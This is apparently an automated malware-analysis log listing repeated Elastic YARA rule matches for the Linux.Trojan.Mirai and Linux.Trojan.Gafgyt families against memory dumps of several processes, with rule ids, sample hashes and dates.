Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
